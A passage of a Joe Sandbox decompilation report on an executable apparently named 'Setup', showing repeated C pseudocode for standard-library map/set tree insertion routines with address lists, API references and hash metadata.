                                                                                                                                                              				if(E0043B350(_v96) - 1 <=  *((intOrPtr*)(_v96 + 8))) {
                                                                                                                                                              					E004134D0( &_v92, "map/set<T> too long");
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					E00413D50( &_v92);
                                                                                                                                                              					E00456A4C( &_v64, 0x544b50);
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              					E00413C20( &_v92);
                                                                                                                                                              				}
                                                                                                                                                              				_v20 = E0043BCD0( *((intOrPtr*)(_v96 + 4)), _a12,  *((intOrPtr*)(_v96 + 4)), _a16, 0);
                                                                                                                                                              				 *((intOrPtr*)(_v96 + 8)) =  *((intOrPtr*)(_v96 + 8)) + 1;
                                                                                                                                                              				if(_a12 !=  *((intOrPtr*)(_v96 + 4))) {
                                                                                                                                                              					__eflags = _a8 & 0x000000ff;
                                                                                                                                                              					if((_a8 & 0x000000ff) == 0) {
                                                                                                                                                              						_t103 = E00441910(_a12);
                                                                                                                                                              						_t293 = _t293 + 4;
                                                                                                                                                              						 *_t103 = _v20;
                                                                                                                                                              						_t104 = E00433720(_v96);
                                                                                                                                                              						__eflags = _a12 -  *_t104;
                                                                                                                                                              						if(_a12 ==  *_t104) {
                                                                                                                                                              							 *((intOrPtr*)(E00433720(_v96))) = _v20;
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						_t187 = E00415110(_a12);
                                                                                                                                                              						_t293 = _t293 + 4;
                                                                                                                                                              						 *_t187 = _v20;
                                                                                                                                                              						_t188 = E00433680(_v96);
                                                                                                                                                              						__eflags = _a12 -  *_t188;
                                                                                                                                                              						if(_a12 ==  *_t188) {
                                                                                                                                                              							 *((intOrPtr*)(E00433680(_v96))) = _v20;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					 *((intOrPtr*)(E0041D410(_v96))) = _v20;
                                                                                                                                                              					 *((intOrPtr*)(E00433680(_v96))) = _v20;
                                                                                                                                                              					 *((intOrPtr*)(E00433720(_v96))) = _v20;
                                                                                                                                                              				}
                                                                                                                                                              				_v24 = _v20;
                                                                                                                                                              				while(1) {
                                                                                                                                                              					_t107 = E0043B340( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              					_t295 = _t293 + 8;
                                                                                                                                                              					if( *_t107 != 0) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					_t113 = E0042AE30(_v24);
                                                                                                                                                              					_t117 = E00415110( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24)))))));
                                                                                                                                                              					_t300 = _t295 + 0x10;
                                                                                                                                                              					if( *_t113 !=  *_t117) {
                                                                                                                                                              						_a12 =  *((intOrPtr*)(E00415110( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24)))))))));
                                                                                                                                                              						_t122 = E0043B340(_a12);
                                                                                                                                                              						_t304 = _t300 + 0x10;
                                                                                                                                                              						__eflags =  *_t122;
                                                                                                                                                              						if( *_t122 != 0) {
                                                                                                                                                              							_t125 = E00415110( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              							_t306 = _t304 + 8;
                                                                                                                                                              							__eflags = _v24 -  *_t125;
                                                                                                                                                              							if(_v24 ==  *_t125) {
                                                                                                                                                              								_t137 = E0042AE30(_v24);
                                                                                                                                                              								_t306 = _t306 + 4;
                                                                                                                                                              								_v24 =  *_t137;
                                                                                                                                                              								E0043BBA0(_v96, __eflags, _v24);
                                                                                                                                                              							}
                                                                                                                                                              							 *((char*)(E0043B340( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
                                                                                                                                                              							 *((char*)(E0043B340( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
                                                                                                                                                              							_t134 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              							_t293 = _t306 + 0x1c;
                                                                                                                                                              							E0042B720(_v96, __eflags,  *_t134);
                                                                                                                                                              						} else {
                                                                                                                                                              							 *((char*)(E0043B340( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
                                                                                                                                                              							 *((char*)(E0043B340(_a12))) = 1;
                                                                                                                                                              							 *((char*)(E0043B340( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
                                                                                                                                                              							_t149 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              							_t293 = _t304 + 0x20;
                                                                                                                                                              							_v24 =  *_t149;
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						_a12 =  *((intOrPtr*)(E00441910( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24)))))))));
                                                                                                                                                              						_t156 = E0043B340(_a12);
                                                                                                                                                              						_t323 = _t300 + 0x10;
                                                                                                                                                              						if( *_t156 != 0) {
                                                                                                                                                              							_t159 = E00441910( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              							_t325 = _t323 + 8;
                                                                                                                                                              							__eflags = _v24 -  *_t159;
                                                                                                                                                              							if(_v24 ==  *_t159) {
                                                                                                                                                              								_t171 = E0042AE30(_v24);
                                                                                                                                                              								_t325 = _t325 + 4;
                                                                                                                                                              								_v24 =  *_t171;
                                                                                                                                                              								E0042B720(_v96, __eflags, _v24);
                                                                                                                                                              							}
                                                                                                                                                              							 *((char*)(E0043B340( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
                                                                                                                                                              							 *((char*)(E0043B340( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
                                                                                                                                                              							_t168 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              							_t293 = _t325 + 0x1c;
                                                                                                                                                              							E0043BBA0(_v96, __eflags,  *_t168);
                                                                                                                                                              						} else {
                                                                                                                                                              							 *((char*)(E0043B340( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
                                                                                                                                                              							 *((char*)(E0043B340(_a12))) = 1;
                                                                                                                                                              							 *((char*)(E0043B340( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
                                                                                                                                                              							_t184 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              							_t293 = _t323 + 0x20;
                                                                                                                                                              							_v24 =  *_t184;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				 *((char*)(E0043B340( *((intOrPtr*)(E0041D410(_v96)))))) = 1;
                                                                                                                                                              				E00445360(_a4, _v20);
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return _a4;
                                                                                                                                                              			}
                                                                                                                                                              0x0042b621
                                                                                                                                                              0x0042b626
                                                                                                                                                              0x0042b62f
                                                                                                                                                              0x0042b529
                                                                                                                                                              0x0042b540
                                                                                                                                                              0x0042b54f
                                                                                                                                                              0x0042b574
                                                                                                                                                              0x0042b586
                                                                                                                                                              0x0042b58b
                                                                                                                                                              0x0042b590
                                                                                                                                                              0x0042b590
                                                                                                                                                              0x0042b3a5
                                                                                                                                                              0x0042b3c9
                                                                                                                                                              0x0042b3d0
                                                                                                                                                              0x0042b3d5
                                                                                                                                                              0x0042b3dd
                                                                                                                                                              0x0042b45d
                                                                                                                                                              0x0042b462
                                                                                                                                                              0x0042b468
                                                                                                                                                              0x0042b46a
                                                                                                                                                              0x0042b470
                                                                                                                                                              0x0042b475
                                                                                                                                                              0x0042b47a
                                                                                                                                                              0x0042b484
                                                                                                                                                              0x0042b484
                                                                                                                                                              0x0042b4a0
                                                                                                                                                              0x0042b4c5
                                                                                                                                                              0x0042b4d7
                                                                                                                                                              0x0042b4dc
                                                                                                                                                              0x0042b4e5
                                                                                                                                                              0x0042b3df
                                                                                                                                                              0x0042b3f6
                                                                                                                                                              0x0042b405
                                                                                                                                                              0x0042b42a
                                                                                                                                                              0x0042b43c
                                                                                                                                                              0x0042b441
                                                                                                                                                              0x0042b446
                                                                                                                                                              0x0042b446
                                                                                                                                                              0x0042b4ea
                                                                                                                                                              0x0042b634
                                                                                                                                                              0x0042b64c
                                                                                                                                                              0x0042b656
                                                                                                                                                              0x0042b661
                                                                                                                                                              0x0042b66d

                                                                                                                                                              APIs
                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 0042B265
                                                                                                                                                                • Part of subcall function 00456A4C: RaiseException.KERNEL32(?,?,00417495,?,?,?,?,?,00417495,?,00544A68,?), ref: 00456A8E
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0042B2B9
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0042B2C6
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0042B2D3
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0042B2FB
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0042B30A
                                                                                                                                                                • Part of subcall function 0043BBA0: HandleT.LIBCPMTD ref: 0043BC34
                                                                                                                                                                • Part of subcall function 0043BBA0: HandleT.LIBCPMTD ref: 0043BC43
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0042B32A
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0042B339
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0042B63C
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 0042B656
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle$AllocatorDebugExceptionException@8HeapRaiseThrow
                                                                                                                                                              • String ID: map/set<T> too long
                                                                                                                                                              • API String ID: 3699313741-1285458680
                                                                                                                                                              • Opcode ID: da666a46221a671458d23c4782ba6a436d42f88bd962fc9e5b9cf5cda22c3e0a
                                                                                                                                                              • Instruction ID: b1522afea4ba9fff5600106d295374d53028bac8961b736bbc1883195429486d
                                                                                                                                                              • Opcode Fuzzy Hash: da666a46221a671458d23c4782ba6a436d42f88bd962fc9e5b9cf5cda22c3e0a
                                                                                                                                                              • Instruction Fuzzy Hash: 36E193F5E001549FDB04EFA1E882A6FB375AF98308F14446DE8055B352EB39F911CBA6
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                              			E00420290(intOrPtr __ecx, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                              				char _v64;
                                                                                                                                                              				char _v92;
                                                                                                                                                              				intOrPtr _v96;
                                                                                                                                                              				signed int _t94;
                                                                                                                                                              				intOrPtr* _t103;
                                                                                                                                                              				intOrPtr* _t104;
                                                                                                                                                              				char* _t107;
                                                                                                                                                              				intOrPtr* _t113;
                                                                                                                                                              				intOrPtr* _t117;
                                                                                                                                                              				char* _t122;
                                                                                                                                                              				intOrPtr* _t125;
                                                                                                                                                              				intOrPtr* _t134;
                                                                                                                                                              				intOrPtr* _t137;
                                                                                                                                                              				intOrPtr* _t149;
                                                                                                                                                              				char* _t156;
                                                                                                                                                              				intOrPtr* _t159;
                                                                                                                                                              				intOrPtr* _t168;
                                                                                                                                                              				intOrPtr* _t171;
                                                                                                                                                              				intOrPtr* _t184;
                                                                                                                                                              				intOrPtr* _t187;
                                                                                                                                                              				intOrPtr* _t188;
                                                                                                                                                              				signed int _t291;
                                                                                                                                                              				void* _t292;
                                                                                                                                                              				void* _t293;
                                                                                                                                                              				void* _t295;
                                                                                                                                                              				void* _t300;
                                                                                                                                                              				void* _t304;
                                                                                                                                                              				void* _t306;
                                                                                                                                                              				void* _t323;
                                                                                                                                                              				void* _t325;
                                                                                                                                                              
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x517298);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t293 = _t292 - 0x50;
                                                                                                                                                              				_t94 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t94 ^ _t291);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v96 = __ecx;
                                                                                                                                                              				if(E00420CF0(_v96) - 1 <=  *((intOrPtr*)(_v96 + 8))) {
                                                                                                                                                              					E004134D0( &_v92, "map/set<T> too long");
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					E00413D50( &_v92);
                                                                                                                                                              					E00456A4C( &_v64, 0x544b50);
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              					E00413C20( &_v92);
                                                                                                                                                              				}
                                                                                                                                                              				_v20 = E00420EC0( *((intOrPtr*)(_v96 + 4)), _a12,  *((intOrPtr*)(_v96 + 4)), _a16, 0);
                                                                                                                                                              				 *((intOrPtr*)(_v96 + 8)) =  *((intOrPtr*)(_v96 + 8)) + 1;
                                                                                                                                                              				if(_a12 !=  *((intOrPtr*)(_v96 + 4))) {
                                                                                                                                                              					__eflags = _a8 & 0x000000ff;
                                                                                                                                                              					if((_a8 & 0x000000ff) == 0) {
                                                                                                                                                              						_t103 = E00441910(_a12);
                                                                                                                                                              						_t293 = _t293 + 4;
                                                                                                                                                              						 *_t103 = _v20;
                                                                                                                                                              						_t104 = E00433720(_v96);
                                                                                                                                                              						__eflags = _a12 -  *_t104;
                                                                                                                                                              						if(_a12 ==  *_t104) {
                                                                                                                                                              							 *((intOrPtr*)(E00433720(_v96))) = _v20;
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						_t187 = E00415110(_a12);
                                                                                                                                                              						_t293 = _t293 + 4;
                                                                                                                                                              						 *_t187 = _v20;
                                                                                                                                                              						_t188 = E00433680(_v96);
                                                                                                                                                              						__eflags = _a12 -  *_t188;
                                                                                                                                                              						if(_a12 ==  *_t188) {
                                                                                                                                                              							 *((intOrPtr*)(E00433680(_v96))) = _v20;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					 *((intOrPtr*)(E0041D410(_v96))) = _v20;
                                                                                                                                                              					 *((intOrPtr*)(E00433680(_v96))) = _v20;
                                                                                                                                                              					 *((intOrPtr*)(E00433720(_v96))) = _v20;
                                                                                                                                                              				}
                                                                                                                                                              				_v24 = _v20;
                                                                                                                                                              				while(1) {
                                                                                                                                                              					_t107 = E00420150( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              					_t295 = _t293 + 8;
                                                                                                                                                              					if( *_t107 != 0) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					_t113 = E0042AE30(_v24);
                                                                                                                                                              					_t117 = E00415110( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24)))))));
                                                                                                                                                              					_t300 = _t295 + 0x10;
                                                                                                                                                              					if( *_t113 !=  *_t117) {
                                                                                                                                                              						_a12 =  *((intOrPtr*)(E00415110( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24)))))))));
                                                                                                                                                              						_t122 = E00420150(_a12);
                                                                                                                                                              						_t304 = _t300 + 0x10;
                                                                                                                                                              						__eflags =  *_t122;
                                                                                                                                                              						if( *_t122 != 0) {
                                                                                                                                                              							_t125 = E00415110( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              							_t306 = _t304 + 8;
                                                                                                                                                              							__eflags = _v24 -  *_t125;
                                                                                                                                                              							if(_v24 ==  *_t125) {
                                                                                                                                                              								_t137 = E0042AE30(_v24);
                                                                                                                                                              								_t306 = _t306 + 4;
                                                                                                                                                              								_v24 =  *_t137;
                                                                                                                                                              								E004208B0(_v96, __eflags, _v24);
                                                                                                                                                              							}
                                                                                                                                                              							 *((char*)(E00420150( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
                                                                                                                                                              							 *((char*)(E00420150( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
                                                                                                                                                              							_t134 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              							_t293 = _t306 + 0x1c;
                                                                                                                                                              							E00420700(_v96, __eflags,  *_t134);
                                                                                                                                                              						} else {
                                                                                                                                                              							 *((char*)(E00420150( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
                                                                                                                                                              							 *((char*)(E00420150(_a12))) = 1;
                                                                                                                                                              							 *((char*)(E00420150( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
                                                                                                                                                              							_t149 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              							_t293 = _t304 + 0x20;
                                                                                                                                                              							_v24 =  *_t149;
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						_a12 =  *((intOrPtr*)(E00441910( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24)))))))));
                                                                                                                                                              						_t156 = E00420150(_a12);
                                                                                                                                                              						_t323 = _t300 + 0x10;
                                                                                                                                                              						if( *_t156 != 0) {
                                                                                                                                                              							_t159 = E00441910( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              							_t325 = _t323 + 8;
                                                                                                                                                              							__eflags = _v24 -  *_t159;
                                                                                                                                                              							if(_v24 ==  *_t159) {
                                                                                                                                                              								_t171 = E0042AE30(_v24);
                                                                                                                                                              								_t325 = _t325 + 4;
                                                                                                                                                              								_v24 =  *_t171;
                                                                                                                                                              								E00420700(_v96, __eflags, _v24);
                                                                                                                                                              							}
                                                                                                                                                              							 *((char*)(E00420150( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
                                                                                                                                                              							 *((char*)(E00420150( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
                                                                                                                                                              							_t168 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              							_t293 = _t325 + 0x1c;
                                                                                                                                                              							E004208B0(_v96, __eflags,  *_t168);
                                                                                                                                                              						} else {
                                                                                                                                                              							 *((char*)(E00420150( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
                                                                                                                                                              							 *((char*)(E00420150(_a12))) = 1;
                                                                                                                                                              							 *((char*)(E00420150( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
                                                                                                                                                              							_t184 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              							_t293 = _t323 + 0x20;
                                                                                                                                                              							_v24 =  *_t184;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				 *((char*)(E00420150( *((intOrPtr*)(E0041D410(_v96)))))) = 1;
                                                                                                                                                              				E00445360(_a4, _v20);
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return _a4;
                                                                                                                                                              			}

                                                                                                                                                              APIs
                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 004202F5
                                                                                                                                                                • Part of subcall function 00456A4C: RaiseException.KERNEL32(?,?,00417495,?,?,?,?,?,00417495,?,00544A68,?), ref: 00456A8E
                                                                                                                                                              • HandleT.LIBCPMTD ref: 00420349
                                                                                                                                                              • HandleT.LIBCPMTD ref: 00420356
                                                                                                                                                              • HandleT.LIBCPMTD ref: 00420363
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0042038B
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0042039A
                                                                                                                                                                • Part of subcall function 004208B0: HandleT.LIBCPMTD ref: 00420944
                                                                                                                                                                • Part of subcall function 004208B0: HandleT.LIBCPMTD ref: 00420953
                                                                                                                                                              • HandleT.LIBCPMTD ref: 004203BA
                                                                                                                                                              • HandleT.LIBCPMTD ref: 004203C9
                                                                                                                                                              • HandleT.LIBCPMTD ref: 004206CC
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 004206E6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle$AllocatorDebugExceptionException@8HeapRaiseThrow
                                                                                                                                                              • String ID: map/set<T> too long
                                                                                                                                                              • API String ID: 3699313741-1285458680
                                                                                                                                                              • Opcode ID: ad2dffa54098eee553e5d828587db46679a889422e0d2e0b931740327440f885
                                                                                                                                                              • Instruction ID: 7913f4163ca43ad304d3f35ed371cff260fae5cd150668d2e043dfa50577e44d
                                                                                                                                                              • Opcode Fuzzy Hash: ad2dffa54098eee553e5d828587db46679a889422e0d2e0b931740327440f885
                                                                                                                                                              • Instruction Fuzzy Hash: FEE1A3F5E001549FDB04EFA1F882A6F73B6AF84308F54446DE8059B352D639E911CBA6
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                              			E00431A00(intOrPtr __ecx, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                              				char _v64;
                                                                                                                                                              				char _v92;
                                                                                                                                                              				intOrPtr _v96;
                                                                                                                                                              				signed int _t94;
                                                                                                                                                              				intOrPtr* _t103;
                                                                                                                                                              				intOrPtr* _t104;
                                                                                                                                                              				char* _t107;
                                                                                                                                                              				intOrPtr* _t113;
                                                                                                                                                              				intOrPtr* _t117;
                                                                                                                                                              				char* _t122;
                                                                                                                                                              				intOrPtr* _t125;
                                                                                                                                                              				intOrPtr* _t134;
                                                                                                                                                              				intOrPtr* _t137;
                                                                                                                                                              				intOrPtr* _t149;
                                                                                                                                                              				char* _t156;
                                                                                                                                                              				intOrPtr* _t159;
                                                                                                                                                              				intOrPtr* _t168;
                                                                                                                                                              				intOrPtr* _t171;
                                                                                                                                                              				intOrPtr* _t184;
                                                                                                                                                              				intOrPtr* _t187;
                                                                                                                                                              				intOrPtr* _t188;
                                                                                                                                                              				signed int _t291;
                                                                                                                                                              				void* _t292;
                                                                                                                                                              				void* _t293;
                                                                                                                                                              				void* _t295;
                                                                                                                                                              				void* _t300;
                                                                                                                                                              				void* _t304;
                                                                                                                                                              				void* _t306;
                                                                                                                                                              				void* _t323;
                                                                                                                                                              				void* _t325;
                                                                                                                                                              
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x517298);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t293 = _t292 - 0x50;
                                                                                                                                                              				_t94 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t94 ^ _t291);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v96 = __ecx;
                                                                                                                                                              				if(E00431E90(_v96) - 1 <=  *((intOrPtr*)(_v96 + 8))) {
                                                                                                                                                              					E004134D0( &_v92, "map/set<T> too long");
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					E00413D50( &_v92);
                                                                                                                                                              					E00456A4C( &_v64, 0x544b50);
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              					E00413C20( &_v92);
                                                                                                                                                              				}
                                                                                                                                                              				_v20 = E00431F40( *((intOrPtr*)(_v96 + 4)), _a12,  *((intOrPtr*)(_v96 + 4)), _a16, 0);
                                                                                                                                                              				 *((intOrPtr*)(_v96 + 8)) =  *((intOrPtr*)(_v96 + 8)) + 1;
                                                                                                                                                              				if(_a12 !=  *((intOrPtr*)(_v96 + 4))) {
                                                                                                                                                              					__eflags = _a8 & 0x000000ff;
                                                                                                                                                              					if((_a8 & 0x000000ff) == 0) {
                                                                                                                                                              						_t103 = E00441910(_a12);
                                                                                                                                                              						_t293 = _t293 + 4;
                                                                                                                                                              						 *_t103 = _v20;
                                                                                                                                                              						_t104 = E00433720(_v96);
                                                                                                                                                              						__eflags = _a12 -  *_t104;
                                                                                                                                                              						if(_a12 ==  *_t104) {
                                                                                                                                                              							 *((intOrPtr*)(E00433720(_v96))) = _v20;
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						_t187 = E00415110(_a12);
                                                                                                                                                              						_t293 = _t293 + 4;
                                                                                                                                                              						 *_t187 = _v20;
                                                                                                                                                              						_t188 = E00433680(_v96);
                                                                                                                                                              						__eflags = _a12 -  *_t188;
                                                                                                                                                              						if(_a12 ==  *_t188) {
                                                                                                                                                              							 *((intOrPtr*)(E00433680(_v96))) = _v20;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					 *((intOrPtr*)(E0041D410(_v96))) = _v20;
                                                                                                                                                              					 *((intOrPtr*)(E00433680(_v96))) = _v20;
                                                                                                                                                              					 *((intOrPtr*)(E00433720(_v96))) = _v20;
                                                                                                                                                              				}
                                                                                                                                                              				_v24 = _v20;
                                                                                                                                                              				while(1) {
                                                                                                                                                              					_t107 = E00409110( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              					_t295 = _t293 + 8;
                                                                                                                                                              					if( *_t107 != 0) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					_t113 = E0042AE30(_v24);
                                                                                                                                                              					_t117 = E00415110( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24)))))));
                                                                                                                                                              					_t300 = _t295 + 0x10;
                                                                                                                                                              					if( *_t113 !=  *_t117) {
                                                                                                                                                              						_a12 =  *((intOrPtr*)(E00415110( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24)))))))));
                                                                                                                                                              						_t122 = E00409110(_a12);
                                                                                                                                                              						_t304 = _t300 + 0x10;
                                                                                                                                                              						__eflags =  *_t122;
                                                                                                                                                              						if( *_t122 != 0) {
                                                                                                                                                              							_t125 = E00415110( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              							_t306 = _t304 + 8;
                                                                                                                                                              							__eflags = _v24 -  *_t125;
                                                                                                                                                              							if(_v24 ==  *_t125) {
                                                                                                                                                              								_t137 = E0042AE30(_v24);
                                                                                                                                                              								_t306 = _t306 + 4;
                                                                                                                                                              								_v24 =  *_t137;
                                                                                                                                                              								E00409350(_v96, __eflags, _v24);
                                                                                                                                                              							}
                                                                                                                                                              							 *((char*)(E00409110( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
                                                                                                                                                              							 *((char*)(E00409110( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
                                                                                                                                                              							_t134 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              							_t293 = _t306 + 0x1c;
                                                                                                                                                              							E004091A0(_v96, __eflags,  *_t134);
                                                                                                                                                              						} else {
                                                                                                                                                              							 *((char*)(E00409110( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
                                                                                                                                                              							 *((char*)(E00409110(_a12))) = 1;
                                                                                                                                                              							 *((char*)(E00409110( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
                                                                                                                                                              							_t149 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              							_t293 = _t304 + 0x20;
                                                                                                                                                              							_v24 =  *_t149;
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						_a12 =  *((intOrPtr*)(E00441910( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24)))))))));
